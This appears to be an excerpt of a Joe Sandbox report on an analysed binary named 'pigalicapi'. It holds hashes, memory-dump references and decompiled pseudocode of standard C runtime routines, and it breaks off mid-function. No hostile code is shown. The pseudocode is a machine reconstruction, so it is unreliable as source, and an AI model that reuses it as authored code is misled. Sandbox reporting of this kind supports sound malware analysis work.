                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.816390745.0000000000FB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816295604.0000000000FB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816834724.0000000000FC9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.817552219.000000000100C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818143401.000000000104D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818176629.000000000104F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_fb0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                                                      • Opcode ID: 0e25380f97129f0a05355ba1c082cf43b91258dad4189fe5dd706031a12bc249
                                                                                                                                                                                                                                                                      • Instruction ID: dc1824f981cf4ab11d8fe1d4f4a8f595f4c011aff968438aa8144a5e87b337f3
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0e25380f97129f0a05355ba1c082cf43b91258dad4189fe5dd706031a12bc249
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB118171A40B04AAD520BBB3CC07FCB779D6F50741F448824B2EAA6062DBADF5457E51
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                                                                                                      			E00FBF424(void* __ecx) {
                                                                                                                                                                                                                                                                      				void* _t4;
                                                                                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                                                                                      				void* _t16;
                                                                                                                                                                                                                                                                      				long _t25;
                                                                                                                                                                                                                                                                      				void* _t28;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				if( *0x104dda0 != 0xffffffff) {
                                                                                                                                                                                                                                                                      					_t25 = GetLastError();
                                                                                                                                                                                                                                                                      					_t11 = E00FC069E(__eflags,  *0x104dda0);
                                                                                                                                                                                                                                                                      					__eflags = _t11 - 0xffffffff;
                                                                                                                                                                                                                                                                      					if(_t11 == 0xffffffff) {
                                                                                                                                                                                                                                                                      						L5:
                                                                                                                                                                                                                                                                      						_t11 = 0;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						__eflags = _t11;
                                                                                                                                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                                                                                                                                      							_t4 = E00FC06D8(__eflags,  *0x104dda0, 0xffffffff);
                                                                                                                                                                                                                                                                      							_pop(_t16);
                                                                                                                                                                                                                                                                      							__eflags = _t4;
                                                                                                                                                                                                                                                                      							if(_t4 != 0) {
                                                                                                                                                                                                                                                                      								_t28 = E00FBA67D(_t16, 1, 0x28);
                                                                                                                                                                                                                                                                      								__eflags = _t28;
                                                                                                                                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                                                                                                                                      									L8:
                                                                                                                                                                                                                                                                      									_t11 = 0;
                                                                                                                                                                                                                                                                      									E00FC06D8(__eflags,  *0x104dda0, 0);
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      									__eflags = E00FC06D8(__eflags,  *0x104dda0, _t28);
                                                                                                                                                                                                                                                                      									if(__eflags != 0) {
                                                                                                                                                                                                                                                                      										_t11 = _t28;
                                                                                                                                                                                                                                                                      										_t28 = 0;
                                                                                                                                                                                                                                                                      										__eflags = 0;
                                                                                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                                                                                      										goto L8;
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								E00FBA6DA(_t28);
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								goto L5;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					SetLastError(_t25);
                                                                                                                                                                                                                                                                      					return _t11;
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      			}








                                                                                                                                                                                                                                                                      0x00fbf42b
                                                                                                                                                                                                                                                                      0x00fbf43e
                                                                                                                                                                                                                                                                      0x00fbf445
                                                                                                                                                                                                                                                                      0x00fbf448
                                                                                                                                                                                                                                                                      0x00fbf44b
                                                                                                                                                                                                                                                                      0x00fbf464
                                                                                                                                                                                                                                                                      0x00fbf464
                                                                                                                                                                                                                                                                      0x00fbf44d
                                                                                                                                                                                                                                                                      0x00fbf44d
                                                                                                                                                                                                                                                                      0x00fbf44f
                                                                                                                                                                                                                                                                      0x00fbf459
                                                                                                                                                                                                                                                                      0x00fbf45f
                                                                                                                                                                                                                                                                      0x00fbf460
                                                                                                                                                                                                                                                                      0x00fbf462
                                                                                                                                                                                                                                                                      0x00fbf472
                                                                                                                                                                                                                                                                      0x00fbf476
                                                                                                                                                                                                                                                                      0x00fbf478
                                                                                                                                                                                                                                                                      0x00fbf48c
                                                                                                                                                                                                                                                                      0x00fbf48c
                                                                                                                                                                                                                                                                      0x00fbf495
                                                                                                                                                                                                                                                                      0x00fbf47a
                                                                                                                                                                                                                                                                      0x00fbf488
                                                                                                                                                                                                                                                                      0x00fbf48a
                                                                                                                                                                                                                                                                      0x00fbf49e
                                                                                                                                                                                                                                                                      0x00fbf4a0
                                                                                                                                                                                                                                                                      0x00fbf4a0
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbf48a
                                                                                                                                                                                                                                                                      0x00fbf4a3
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbf462
                                                                                                                                                                                                                                                                      0x00fbf44f
                                                                                                                                                                                                                                                                      0x00fbf4ab
                                                                                                                                                                                                                                                                      0x00fbf4b5
                                                                                                                                                                                                                                                                      0x00fbf42d
                                                                                                                                                                                                                                                                      0x00fbf42f
                                                                                                                                                                                                                                                                      0x00fbf42f

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,00FBF41B,00FBE807), ref: 00FBF432
                                                                                                                                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00FBF440
                                                                                                                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FBF459
                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,00FBF41B,00FBE807), ref: 00FBF4AB
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.816390745.0000000000FB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816295604.0000000000FB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816834724.0000000000FC9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.817552219.000000000100C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818143401.000000000104D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818176629.000000000104F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_fb0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                      • Opcode ID: c57b4d0b42c3164852575817955cf6c6f08f550438849bfe70a8ef0cee6625ab
                                                                                                                                                                                                                                                                      • Instruction ID: 35b2b8fbe18290ed927d113beecc9dfbcea5633465884770d91d3695d1ed2999
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c57b4d0b42c3164852575817955cf6c6f08f550438849bfe70a8ef0cee6625ab
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5014C7271E312DFA6643AB6EE8A9A73748EB103B4330033DF950411E5EF160C09BB00
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 72%
                                                                                                                                                                                                                                                                      			E00FB9C30(void* __ebx, void* __ecx, void* __edx) {
                                                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                                                      				intOrPtr _t2;
                                                                                                                                                                                                                                                                      				void* _t3;
                                                                                                                                                                                                                                                                      				void* _t4;
                                                                                                                                                                                                                                                                      				intOrPtr _t9;
                                                                                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                                                                                      				void* _t25;
                                                                                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                                                                                      				void* _t29;
                                                                                                                                                                                                                                                                      				void* _t31;
                                                                                                                                                                                                                                                                      				void* _t32;
                                                                                                                                                                                                                                                                      				long _t36;
                                                                                                                                                                                                                                                                      				long _t37;
                                                                                                                                                                                                                                                                      				void* _t40;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t29 = __edx;
                                                                                                                                                                                                                                                                      				_t23 = __ecx;
                                                                                                                                                                                                                                                                      				_t20 = __ebx;
                                                                                                                                                                                                                                                                      				_t36 = GetLastError();
                                                                                                                                                                                                                                                                      				_t2 =  *0x104d70c; // 0x2
                                                                                                                                                                                                                                                                      				_t42 = _t2 - 0xffffffff;
                                                                                                                                                                                                                                                                      				if(_t2 == 0xffffffff) {
                                                                                                                                                                                                                                                                      					L2:
                                                                                                                                                                                                                                                                      					_t3 = E00FBA67D(_t23, 1, 0x364);
                                                                                                                                                                                                                                                                      					_t31 = _t3;
                                                                                                                                                                                                                                                                      					_pop(_t25);
                                                                                                                                                                                                                                                                      					if(_t31 != 0) {
                                                                                                                                                                                                                                                                      						_t4 = E00FBA92D(_t25, _t36, __eflags,  *0x104d70c, _t31);
                                                                                                                                                                                                                                                                      						__eflags = _t4;
                                                                                                                                                                                                                                                                      						if(_t4 != 0) {
                                                                                                                                                                                                                                                                      							E00FB9AA2(_t25, _t31, 0x104df44);
                                                                                                                                                                                                                                                                      							E00FBA6DA(0);
                                                                                                                                                                                                                                                                      							_t40 = _t40 + 0xc;
                                                                                                                                                                                                                                                                      							__eflags = _t31;
                                                                                                                                                                                                                                                                      							if(_t31 == 0) {
                                                                                                                                                                                                                                                                      								goto L9;
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								goto L8;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                                                      							_push(_t31);
                                                                                                                                                                                                                                                                      							goto L4;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_push(_t3);
                                                                                                                                                                                                                                                                      						L4:
                                                                                                                                                                                                                                                                      						E00FBA6DA();
                                                                                                                                                                                                                                                                      						_pop(_t25);
                                                                                                                                                                                                                                                                      						L9:
                                                                                                                                                                                                                                                                      						SetLastError(_t36);
                                                                                                                                                                                                                                                                      						E00FBA63A(_t20, _t29, _t31, _t36);
                                                                                                                                                                                                                                                                      						asm("int3");
                                                                                                                                                                                                                                                                      						_push(_t20);
                                                                                                                                                                                                                                                                      						_push(_t36);
                                                                                                                                                                                                                                                                      						_push(_t31);
                                                                                                                                                                                                                                                                      						_t37 = GetLastError();
                                                                                                                                                                                                                                                                      						_t21 = 0;
                                                                                                                                                                                                                                                                      						_t9 =  *0x104d70c; // 0x2
                                                                                                                                                                                                                                                                      						_t45 = _t9 - 0xffffffff;
                                                                                                                                                                                                                                                                      						if(_t9 == 0xffffffff) {
                                                                                                                                                                                                                                                                      							L12:
                                                                                                                                                                                                                                                                      							_t32 = E00FBA67D(_t25, 1, 0x364);
                                                                                                                                                                                                                                                                      							_pop(_t27);
                                                                                                                                                                                                                                                                      							if(_t32 != 0) {
                                                                                                                                                                                                                                                                      								_t11 = E00FBA92D(_t27, _t37, __eflags,  *0x104d70c, _t32);
                                                                                                                                                                                                                                                                      								__eflags = _t11;
                                                                                                                                                                                                                                                                      								if(_t11 != 0) {
                                                                                                                                                                                                                                                                      									E00FB9AA2(_t27, _t32, 0x104df44);
                                                                                                                                                                                                                                                                      									E00FBA6DA(_t21);
                                                                                                                                                                                                                                                                      									__eflags = _t32;
                                                                                                                                                                                                                                                                      									if(_t32 != 0) {
                                                                                                                                                                                                                                                                      										goto L19;
                                                                                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                                                                                      										goto L18;
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      									_push(_t32);
                                                                                                                                                                                                                                                                      									goto L14;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								_push(_t21);
                                                                                                                                                                                                                                                                      								L14:
                                                                                                                                                                                                                                                                      								E00FBA6DA();
                                                                                                                                                                                                                                                                      								L18:
                                                                                                                                                                                                                                                                      								SetLastError(_t37);
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                                                      							_t32 = E00FBA8D7(_t25, _t37, _t45, _t9);
                                                                                                                                                                                                                                                                      							if(_t32 != 0) {
                                                                                                                                                                                                                                                                      								L19:
                                                                                                                                                                                                                                                                      								SetLastError(_t37);
                                                                                                                                                                                                                                                                      								_t21 = _t32;
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								goto L12;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						return _t21;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					_t31 = E00FBA8D7(_t23, _t36, _t42, _t2);
                                                                                                                                                                                                                                                                      					if(_t31 != 0) {
                                                                                                                                                                                                                                                                      						L8:
                                                                                                                                                                                                                                                                      						SetLastError(_t36);
                                                                                                                                                                                                                                                                      						return _t31;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						goto L2;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      			}





















                                                                                                                                                                                                                                                                      0x00fb9c30
                                                                                                                                                                                                                                                                      0x00fb9c30
                                                                                                                                                                                                                                                                      0x00fb9c30
                                                                                                                                                                                                                                                                      0x00fb9c3a
                                                                                                                                                                                                                                                                      0x00fb9c3c
                                                                                                                                                                                                                                                                      0x00fb9c41
                                                                                                                                                                                                                                                                      0x00fb9c44
                                                                                                                                                                                                                                                                      0x00fb9c52
                                                                                                                                                                                                                                                                      0x00fb9c59
                                                                                                                                                                                                                                                                      0x00fb9c5e
                                                                                                                                                                                                                                                                      0x00fb9c61
                                                                                                                                                                                                                                                                      0x00fb9c64
                                                                                                                                                                                                                                                                      0x00fb9c76
                                                                                                                                                                                                                                                                      0x00fb9c7b
                                                                                                                                                                                                                                                                      0x00fb9c7d
                                                                                                                                                                                                                                                                      0x00fb9c88
                                                                                                                                                                                                                                                                      0x00fb9c8f
                                                                                                                                                                                                                                                                      0x00fb9c94
                                                                                                                                                                                                                                                                      0x00fb9c97
                                                                                                                                                                                                                                                                      0x00fb9c99
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fb9c7f
                                                                                                                                                                                                                                                                      0x00fb9c7f
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fb9c7f
                                                                                                                                                                                                                                                                      0x00fb9c66
                                                                                                                                                                                                                                                                      0x00fb9c66
                                                                                                                                                                                                                                                                      0x00fb9c67
                                                                                                                                                                                                                                                                      0x00fb9c67
                                                                                                                                                                                                                                                                      0x00fb9c6c
                                                                                                                                                                                                                                                                      0x00fb9ca7
                                                                                                                                                                                                                                                                      0x00fb9ca8
                                                                                                                                                                                                                                                                      0x00fb9cae
                                                                                                                                                                                                                                                                      0x00fb9cb3
                                                                                                                                                                                                                                                                      0x00fb9cb6
                                                                                                                                                                                                                                                                      0x00fb9cb7
                                                                                                                                                                                                                                                                      0x00fb9cb8
                                                                                                                                                                                                                                                                      0x00fb9cbf
                                                                                                                                                                                                                                                                      0x00fb9cc1
                                                                                                                                                                                                                                                                      0x00fb9cc3
                                                                                                                                                                                                                                                                      0x00fb9cc8
                                                                                                                                                                                                                                                                      0x00fb9ccb
                                                                                                                                                                                                                                                                      0x00fb9cd9
                                                                                                                                                                                                                                                                      0x00fb9ce5
                                                                                                                                                                                                                                                                      0x00fb9ce8
                                                                                                                                                                                                                                                                      0x00fb9ceb
                                                                                                                                                                                                                                                                      0x00fb9cfd
                                                                                                                                                                                                                                                                      0x00fb9d02
                                                                                                                                                                                                                                                                      0x00fb9d04
                                                                                                                                                                                                                                                                      0x00fb9d0f
                                                                                                                                                                                                                                                                      0x00fb9d15
                                                                                                                                                                                                                                                                      0x00fb9d1d
                                                                                                                                                                                                                                                                      0x00fb9d1f
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fb9d06
                                                                                                                                                                                                                                                                      0x00fb9d06
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fb9d06
                                                                                                                                                                                                                                                                      0x00fb9ced
                                                                                                                                                                                                                                                                      0x00fb9ced
                                                                                                                                                                                                                                                                      0x00fb9cee
                                                                                                                                                                                                                                                                      0x00fb9cee
                                                                                                                                                                                                                                                                      0x00fb9d21
                                                                                                                                                                                                                                                                      0x00fb9d22
                                                                                                                                                                                                                                                                      0x00fb9d22
                                                                                                                                                                                                                                                                      0x00fb9ccd
                                                                                                                                                                                                                                                                      0x00fb9cd3
                                                                                                                                                                                                                                                                      0x00fb9cd7
                                                                                                                                                                                                                                                                      0x00fb9d2a
                                                                                                                                                                                                                                                                      0x00fb9d2b
                                                                                                                                                                                                                                                                      0x00fb9d31
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fb9cd7
                                                                                                                                                                                                                                                                      0x00fb9d38
                                                                                                                                                                                                                                                                      0x00fb9d38
                                                                                                                                                                                                                                                                      0x00fb9c46
                                                                                                                                                                                                                                                                      0x00fb9c4c
                                                                                                                                                                                                                                                                      0x00fb9c50
                                                                                                                                                                                                                                                                      0x00fb9c9b
                                                                                                                                                                                                                                                                      0x00fb9c9c
                                                                                                                                                                                                                                                                      0x00fb9ca6
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fb9c50

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,00FB5EB1,?,?,?,00FB4B88,?), ref: 00FB9C34
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FB9C67
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FB9C8F
                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?), ref: 00FB9C9C
                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?), ref: 00FB9CA8
                                                                                                                                                                                                                                                                      • _abort.LIBCMT ref: 00FB9CAE
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.816390745.0000000000FB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816295604.0000000000FB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816834724.0000000000FC9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.817552219.000000000100C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818143401.000000000104D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818176629.000000000104F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_fb0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                      • Opcode ID: 6c55f36cc74a6eb2ab01f64c20e4ce99df07c838c829f1a8540f260e316b2404
                                                                                                                                                                                                                                                                      • Instruction ID: 6045afb477f369af05e5b8deb8b9e8f426357e9351014a98c217c9a47ec87735
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c55f36cc74a6eb2ab01f64c20e4ce99df07c838c829f1a8540f260e316b2404
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2EF0AEB554C70167C21263376E4AEDA3B9D9BD1770B350124FA64D3195EF998C027E11
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00FBC1FF,00FBA67C,?,00FBC19F,00FBA67C,0100A700,0000000C,00FBC2F6,00FBA67C,00000002), ref: 00FBC26E
                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FBC281
                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00FBC1FF,00FBA67C,?,00FBC19F,00FBA67C,0100A700,0000000C,00FBC2F6,00FBA67C,00000002,00000000), ref: 00FBC2A4
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.816390745.0000000000FB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816295604.0000000000FB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816834724.0000000000FC9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.817552219.000000000100C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818143401.000000000104D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818176629.000000000104F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_fb0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                      • Opcode ID: 534a2121dd37988144bf1890f9c092275c299b53016403dc2c50b36e8220c04d
                                                                                                                                                                                                                                                                      • Instruction ID: 97cdddeb67583a81732de4fa3e31c798d0f10e16f7a38e1ca439a58781440361
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 534a2121dd37988144bf1890f9c092275c299b53016403dc2c50b36e8220c04d
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3F04471A4420CBBDB155FA1DD0AFDE7FB5EF44711F0400A8F809A7150DBB55944EB90
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 70%
                                                                                                                                                                                                                                                                      			E00FBA4FD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                                                      				int _v12;
                                                                                                                                                                                                                                                                      				char _v16;
                                                                                                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                                                                                                      				char _v28;
                                                                                                                                                                                                                                                                      				void* _v40;
                                                                                                                                                                                                                                                                      				signed int _t34;
                                                                                                                                                                                                                                                                      				signed int _t40;
                                                                                                                                                                                                                                                                      				int _t46;
                                                                                                                                                                                                                                                                      				int _t53;
                                                                                                                                                                                                                                                                      				void* _t55;
                                                                                                                                                                                                                                                                      				int _t57;
                                                                                                                                                                                                                                                                      				signed int _t63;
                                                                                                                                                                                                                                                                      				int _t67;
                                                                                                                                                                                                                                                                      				short* _t69;
                                                                                                                                                                                                                                                                      				signed int _t70;
                                                                                                                                                                                                                                                                      				short* _t71;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t34 =  *0x104dd74; // 0xfe5fa47e
                                                                                                                                                                                                                                                                      				_v8 = _t34 ^ _t70;
                                                                                                                                                                                                                                                                      				E00FB5E73(__ebx,  &_v28, __edx, _a4);
                                                                                                                                                                                                                                                                      				_t57 = _a24;
                                                                                                                                                                                                                                                                      				if(_t57 == 0) {
                                                                                                                                                                                                                                                                      					_t53 =  *(_v24 + 8);
                                                                                                                                                                                                                                                                      					_t57 = _t53;
                                                                                                                                                                                                                                                                      					_a24 = _t53;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				_t67 = 0;
                                                                                                                                                                                                                                                                      				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                                                                                                                                                                                                                                      				_v12 = _t40;
                                                                                                                                                                                                                                                                      				if(_t40 == 0) {
                                                                                                                                                                                                                                                                      					L15:
                                                                                                                                                                                                                                                                      					if(_v16 != 0) {
                                                                                                                                                                                                                                                                      						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					return E00FBDC5F(_v8 ^ _t70);
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				_t55 = _t40 + _t40;
                                                                                                                                                                                                                                                                      				asm("sbb eax, eax");
                                                                                                                                                                                                                                                                      				if((_t55 + 0x00000008 & _t40) == 0) {
                                                                                                                                                                                                                                                                      					_t69 = 0;
                                                                                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                                                                                      					if(_t69 != 0) {
                                                                                                                                                                                                                                                                      						E00FBF070(_t67, _t69, _t67, _t55);
                                                                                                                                                                                                                                                                      						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
                                                                                                                                                                                                                                                                      						if(_t46 != 0) {
                                                                                                                                                                                                                                                                      							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					L14:
                                                                                                                                                                                                                                                                      					E00FBA61A(_t69);
                                                                                                                                                                                                                                                                      					goto L15;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				asm("sbb eax, eax");
                                                                                                                                                                                                                                                                      				_t48 = _t40 & _t55 + 0x00000008;
                                                                                                                                                                                                                                                                      				_t63 = _t55 + 8;
                                                                                                                                                                                                                                                                      				if((_t40 & _t55 + 0x00000008) > 0x400) {
                                                                                                                                                                                                                                                                      					asm("sbb eax, eax");
                                                                                                                                                                                                                                                                      					_t69 = E00FBBD19(_t63, _t48 & _t63);
                                                                                                                                                                                                                                                                      					if(_t69 == 0) {
                                                                                                                                                                                                                                                                      						goto L14;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					 *_t69 = 0xdddd;
